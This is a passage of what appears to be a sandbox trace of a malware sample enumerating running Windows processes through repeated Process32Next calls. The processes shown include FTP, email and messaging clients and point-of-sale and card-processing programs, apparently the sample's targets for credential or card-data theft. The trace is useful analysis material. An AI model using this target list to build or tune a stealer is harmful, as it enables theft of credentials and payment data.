lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0202.854] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0202.858] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0202.861] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0202.863] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0202.865] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0202.868] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0202.921] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0202.924] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0202.927] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0202.929] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0202.932] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0202.934] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0202.937] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0202.939] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0202.941] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0202.943] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0202.946] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0202.948] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0202.950] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0202.952] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0202.958] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0202.960] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0202.963] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0202.965] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0202.967] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0202.969] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0202.972] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0202.974] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0202.976] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0202.978] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0202.980] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0202.983] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0202.985] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0202.987] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0202.991] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0202.997] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0203.000] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0203.002] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0203.005] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0203.010] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0203.012] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0203.015] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0203.018] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0203.020] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0203.022] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0203.024] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0203.026] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0203.028] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.030] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0203.031] CloseHandle (hObject=0x20c0) returned 1 [0203.032] Sleep (dwMilliseconds=0x64) [0203.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20d0 [0203.154] Process32First (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.155] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.157] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.159] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.161] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.163] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.165] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.167] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.170] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.171] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.187] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.190] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.192] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.194] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.196] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.198] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.200] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.202] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.204] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.206] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.208] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0203.211] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.213] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0203.215] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.218] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0203.254] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0203.257] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0203.261] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0203.263] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0203.266] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0203.268] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.270] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.272] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0203.274] Process32Next (in: hSnapshot=0x20d0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.276] Process32Next (in: 